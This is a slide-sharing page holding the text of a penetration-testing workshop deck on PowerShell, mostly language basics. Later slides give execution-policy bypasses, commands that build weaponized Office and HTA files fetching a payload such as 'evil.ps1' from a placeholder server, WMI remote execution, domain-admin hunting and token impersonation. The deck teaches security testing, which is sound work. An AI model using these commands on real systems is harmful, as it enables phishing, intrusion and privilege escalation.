Property Based Testing in PHPProperty Based Testing in PHP
Property Based Testing in PHP
 
Developer testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing FanaticDeveloper testing 101: Become a Testing Fanatic
Developer testing 101: Become a Testing Fanatic
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShell
 
PowerShell-1
PowerShell-1PowerShell-1
PowerShell-1
 
PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2PowerShell Workshop Series: Session 2
PowerShell Workshop Series: Session 2
 
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easyDEF CON 23 - Rich Kelley - harness powershell weaponization made easy
DEF CON 23 - Rich Kelley - harness powershell weaponization made easy
 
Ansible
AnsibleAnsible
Ansible
 
ONOS System Test - ONS2016
ONOS System Test - ONS2016ONOS System Test - ONS2016
ONOS System Test - ONS2016
 
Power shell for sp admins
Power shell for sp adminsPower shell for sp admins
Power shell for sp admins
 
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment OptionsNagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
Nagios Conference 2014 - Mike Weber - Nagios Rapid Deployment Options
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent Event
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
coLearning PHP
coLearning PHPcoLearning PHP
coLearning PHP
 
Test in action week 2
Test in action   week 2Test in action   week 2
Test in action week 2
 

Recently uploaded

Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
Techgropse Pvt.Ltd.
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Speck&Tech
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
Mariano Tinti
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
Pixlogix Infotech
 
OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
David Brossard
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
danishmna97
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
Edge AI and Vision Alliance
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
shyamraj55
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
DianaGray10
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
Wouter Lemaire
 

Recently uploaded (20)

Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with SlackLet's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
 
UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6UiPath Test Automation using UiPath Test Suite series, part 6
UiPath Test Automation using UiPath Test Suite series, part 6
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
UI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentationUI5 Controls simplified - UI5con2024 presentation
UI5 Controls simplified - UI5con2024 presentation
 

Workshop: PowerShell for Penetration Testers

  • 2. Get-Host • Hacker, Trainer, Speaker, Penetration Tester • Creator of Kautilya and Nishang. • Twitter: @nikhil_mitt • Blog – http://labofapenetrationtester.com • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous talks: Defcon, Blackhat, Troopers, DeepSec, EuSecwest, Hackfest, PHDays etc. 2PowerShell for Penetration Testers HITB
  • 3. $PFPTLab = Get-Content • What is PowerShell • Why PowerShell • Executing commands, scripts and modules • Extended PowerShell usage • A Penetration Testing Scenario • Defenses 3PowerShell for Penetration Testers HITB
  • 4. $PFPTLab | Format-Custom • This is a hands-on workshop, keep your Windows machines/VMs ready. • We will stick to PowerShell v2, unless specified otherwise. • For language basics, we will go with bare minimum to be able to cover interesting stuff in couple of hours. • The workshop assumes zero knowledge of PowerShell so if you know something: do {Start-Sleep –s 60} while {$SomethingNew –ne $true} 4PowerShell for Penetration Testers HITB
  • 5. $PFPTLab | where-object {$_ -eq “What is PowerShell"} • “Windows PowerShell® is a task-based command- line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en- us/library/bb978526.aspx 5PowerShell for Penetration Testers HITB
  • 6. $PFPTLab | where-object {$_ -eq “Why PowerShell"} • Present by default on modern Windows OS. • Tightly integrated with Windows and allows interaction with .Net, Filesystem, Registry, API, Certificates, COM, native commands, network, domain etc. • Expandable with use of .Net framework. • Easy to learn. • Less dependency on *nix based tools. • Trusted by System Admins, Blue Teams and (mostly) AV etc. 6PowerShell for Penetration Testers HITB
  • 7. Why PowerShell? PowerShell for Penetration Testers HITB 7 http://www.quickmeme.com/ONE-OF-US
  • 8. about_PowerShell.exe • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 8PowerShell for Penetration Testers HITB
  • 9. Invoke-HandsOn • Try running powershell.exe and Write-Output “Hello World” • Try usual bash and cmd commands. 9PowerShell for Penetration Testers HITB
  • 10. $PFPTLab | where-object {$_ -eq “powershell.exe"} • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 10PowerShell for Penetration Testers HITB
  • 11. Get-Help Get-Help • Easy to use and very useful. • This is the first place to go for learning something new or looking for solution to a problem. • Detailed help for cmdlets, conceptual topics, scripts, functions and modules. • Supports wildcards. • You may need to run Update-Help (v3 onwards). 11PowerShell for Penetration Testers HITB
  • 12. Get-Help Get-Help • Use with about_* to list help about a conceptual topic. • Various parameters could be passed to Get-Help Get-Help Get-Help –Full Get-Help Get-Command -Examples 12PowerShell for Penetration Testers HITB
  • 13. $Exercise[0] 1. Use PowerShell help system to list everything available. 2. List help about “process”. 3. List help about powershell.exe conceptual topic. 13PowerShell for Penetration Testers HITB
  • 14. $PFPTLab | where-object {$_ -eq “cmdlets"} • A Cmdlet is pronounced as “command let”. • Cmdlets are task based compiled .Net classes. • Certainly one of the best features of PowerShell. • They follow a Verb-Noun naming convention. • Cmdlets have aliases. • Like every other command in PowerShell, cmdlets return objects. 14PowerShell for Penetration Testers HITB
  • 15. $PFPTLab | where-object {$_ -eq “cmdlets"} • Explore cmdlets Get-Command –CommandType Cmdlet • Explore cmdlets based on a verb Get-Command –Verb Get • Get-Command also supports wildcards. 15PowerShell for Penetration Testers HITB
  • 16. Invoke-HandsOn • I need a count shout for number of Cmdlets you have on your machine. Get-Command –CommandType Cmdlet | Measure-Object • As you can see, PowerShell supports the pipe (|) operator as well. 16PowerShell for Penetration Testers HITB
  • 17. $Exercise[1] 1. I need names of three cmdlets each from everyone which can be useful in Penetration Tests. 17PowerShell for Penetration Testers HITB
  • 18. about_Windows_PowerShell_ISE • A GUI Scripting environment. • Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features. • PowerShell scripts have .ps1 extension. 18PowerShell for Penetration Testers HITB
  • 19. Invoke-HandsOn 1. Write a script which prints Hello World. 2. Save it and execute it. 19PowerShell for Penetration Testers HITB
  • 21. about_Execution_Policies • Execution Policy is present to stop a user from accidently running scripts. • There are numerous ways to bypass it: powershell.exe –ExecutionPolicy bypass .script.ps1 powershell.exe –EncodedCommand <> powershell.exe –c <> Read: 15 ways to bypass PowerShell execution policy https://www.netspi.com/blog/entryid/238/15-ways-to- bypass-the-powershell-execution-policy 21PowerShell for Penetration Testers HITB
  • 22. $PFPTLab | where-object {$_ -eq “Variables"} • Variables are declared in the form $varname. • Variables can hold outputs from Cmdlets, native commands, functions etc. as each one returns an object or array of objects. Examples: $DirList = Get-Childitem $UserList = & "net" "user" 22PowerShell for Penetration Testers HITB
  • 23. $PFPTLab | where-object {$_ -eq “Types"} • PowerShell is not strictly typed. • You need not specify the Type of a variable. • If required, Type conversion could be done with the cast [] operator. 23PowerShell for Penetration Testers HITB
  • 24. $PFPTLab | where-object {$_ -eq “Statements"} • Conditional Statements – If, else, elseif, Switch • Loop Statements – while() {}, do {} while(), do {} until(), for(;;){}, foreach ( in ){} – ForEach-Object 24PowerShell for Penetration Testers HITB
  • 25. $PFPTLab | where-object {$_ -eq “Functions"} • Basic Declaration function <function_name> ( param1, param2) { do stuff } • Calling a function <function_name> <value1> <value2> • param statement provides advanced attributes for function parameters. 25PowerShell for Penetration Testers HITB
  • 27. $PFPTLab | where-object {$_ -eq “Basics of Modules"} • A simplest module is a PowerShell script with the extension .psm1 • Use Get-Module -ListAvailable to list modules. • Use Import-Module <modulepath>to import a module. • Use Get-Command –Module <Modulename> to list functions exported by a module. 27PowerShell for Penetration Testers HITB
  • 28. $Exercise[2] 1. Convert the script Check-RegistryKey.ps1 to a script module. 2. Try importing the module and use its functions. 28PowerShell for Penetration Testers HITB
  • 29. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Most powerful feature of PowerShell. Great to extend the existing capabilities of PowerShell. • Useful for loading .Net assemblies, using Windows API, using .Net code and classes in a PowerShell script. 29PowerShell for Penetration Testers HITB
  • 30. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Exploring .Net classes $ProcClass = [AppDomain]::CurrentDomain.GetA ssemblies() | ForEach-Object {$_.GetTypes()}| where {$_.IsPublic -eq "True“} | where {$_.Name -eq “Process”} 30PowerShell for Penetration Testers HITB
  • 31. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Static Methods $ProcClass | Get-Member –Static $ProcClass:: GetProcesses() 31PowerShell for Penetration Testers HITB
  • 32. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Creating instance $WebClient = New-Object System.Net.WebClient $WebClient | Get-Member –MemberType Method $WebClient | Get-Member -Name DownloadString | Format-List * $WebClient.DownloadString("http://google.com") 32PowerShell for Penetration Testers HITB
  • 33. $PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Use Add-Type to add .Net code/classes and Windows API to a PowerShell script or session. • See New-DotnetCode.ps1 for example of using .Net code. 33PowerShell for Penetration Testers HITB
  • 34. $PFPTLab | where-object {$_ -eq WMI"} • WMI is a treasure trove for hackers. • PowerShell could be used to retrieve information from WMI as well execute commands and scripts. • Explore the cmdlets related to WMI Get-Command -CommandType Cmdlet – Name *wmi* 34PowerShell for Penetration Testers HITB
  • 35. $PFPTLab | where-object {$_ -eq WMI"} • To run a PowerShll command using WMI use: Invoke-WmiMethod -Class win32_process -Name create - ArgumentList "powershell -c Get-Process" –ComputerName <> 35PowerShell for Penetration Testers HITB
  • 36. $PFPTLab | where-object {$_ -eq COM"} • PowerShell can use COM Objects as well. • Limitless opportunities for automation! $ie = New-Object -ComObject internetexplorer.application $ie | Get-Member 36PowerShell for Penetration Testers HITB
  • 37. $PFPTLab | where-object {$_ -eq PenTest Scenario"} • Lets consider a Pen Test scenario: – The Goal of Penetration Test is to get access to get Domain Administrator access (not a very good goal but lets target it for this lab . – Server side attacks have been largely unsuccessful. – Msf payloads are being detected by Anti Virus and other countermeasures. 37PowerShell for Penetration Testers HITB
  • 38. $Exploitation = $PFPTLab | where- object {$_ -eq Exploitation"} • PowerShell is very useful in getting a foothold system in a target network. • The trust on PowerShell by system administrators and countermeasures like AV makes it an ideal tool for Exploitation. 38PowerShell for Penetration Testers HITB
  • 39. $Exploitation | where-object {$_ -eq Client Side Attacks"} • PowerShell is an ideal tool for client side attacks on a Windows platform. • It could be used for generating weaponized files for email phishing campaigns and drive by download attacks. • Lets use Client Side attack scripts from Nishang (https://github.com/samratashok/nishang) 39PowerShell for Penetration Testers HITB
  • 40. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Generating weaponized MS Office Files Out-Word -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile - noexit -c Get-Process“ Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Out-Excel -Payload "powershell.exe –EncodedCommand <>“ 40PowerShell for Penetration Testers HITB
  • 41. $Exploitation | where-object {$_ -eq Client Side Attacks"} • Drive by download attacks Out-HTA -PayloadURL http://192.168.254.1/powerpreter.ps m1 -Arguments Check-VM • More weaponized files Out-CHM Out-Shortcut 41PowerShell for Penetration Testers HITB
  • 42. $Exploitation | where-object {$_ -eq Shells"} • Now that we can run successful client side attacks, we may need shell level access for further attacks. • PowerShell can be used to write shells as well. • Shells in PowerShell can be used with exploits to get access to the target machine. 42PowerShell for Penetration Testers HITB
  • 43. $Exploitation | where-object {$_ -eq Shells"} • Interactive PowerShell Shells from Nishang • Metasploit’s msfvenom - Meterpreter using PowerShell 43PowerShell for Penetration Testers HITB
  • 44. $PostExp = $PFPTLab | where-object {$_ -eq Post Exploitation"} • PowerShell is arguably one of the best tools around for Windows Post Exploitation. • We have an interactive PowerShell session on one of the machines on the target and various PowerShell tools can be used now. 44PowerShell for Penetration Testers HITB
  • 45. $PostExp | where-object {$_ -eq Domain Enumeration"} • We can use Powerview (https://github.com/Veil- Framework/PowerTools/tree/master/Power View) to enumerate the target domain. • The goal is to find a machine where a Domain Admin is logged in. 45PowerShell for Penetration Testers HITB
  • 46. $PostExp | where-object {$_ -eq Domain Enumeration"} • To find machines which have a domain admin logged in and the current user has access to that machine: Invoke-UserHunter –CheckAccess –Domain <targetdomain> 46PowerShell for Penetration Testers HITB
  • 47. $PostExp | where-object {$_ -eq Priv Escalation"} • Now we can use the Domain Admin token on the target machine using Invoke- TokenManipulation and some PowerShell hackery: Get-Process -id <DA process> | Invoke-TokenManipulation CreateProcess cmd.exe Invoke-TokenManipulation is a part of Powersploit (https://github.com/mattifestation/PowerSploit) 47PowerShell for Penetration Testers HITB
  • 48.
  • 49. $PFPTLab | where-object {$_ -eq Defenses"} • Log Log Log! • Monitor and Analyze the logs. • Understand flow/use of privileges and credentials in your environment. • If a determined attacker can break into any system, a determined system administrator can catch any attacker as well. 49PowerShell for Penetration Testers HITB
  • 50. $PFPTLab | where-object {$_ -eq Credits"} Credits/FF to PowerShell hackers (in no particular order) @obscuresec, @mattifestation, @JosephBialek, @Carlos_Perez, @Lee_Holmes, @ScriptingGuys, @BrucePayette, @dave_rel1k, @enigma0x3, @subTee, @harmj0y and other PowerShell bloggers and book writers. 50PowerShell for Penetration Testers HITB
  • 51. $PFPTLab | where-object {$_ -eq Closing Remarks"} • Bad guys are already using PowerShell, using it for security testing is imperative now. Both for red teams and blue teams. • PowerShell is the not the future of Windows Penetration Testing, it is the present. 51PowerShell for Penetration Testers HITB
  • 52. $PFPTLab | where-object {$_ -eq Self Promotion"} • Check out PowerShell for Penetration Testers two days trainings at: http://www.labofapenetrationtester.com/p/tr ainings.html#pfptschedule 52PowerShell for Penetration Testers HITB
  • 53. $PFPTLab | where-object {$_ -eq Feedback"} • Please fill the feedback form. • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 53PowerShell for Penetration Testers HITB

Editor's Notes

  1. http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/11/use-powershell-to-work-with-the-net-framework-classes.aspx http://powershell.com/cs/blogs/ebookv2/archive/2012/03/27/chapter-20-loading-net-libraries-and-compiling-code.aspx
  2. http://www.darkoperator.com/blog/2013/2/6/introduction-to-wmi-basics-with-powershell-part-2-exploring.html
  3. http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
  4. www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
  5. http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  6. Incognito: .\incognito.exe -h newpc -u domainuser -p <> execute -c BHARAT\Administrator cmd.exe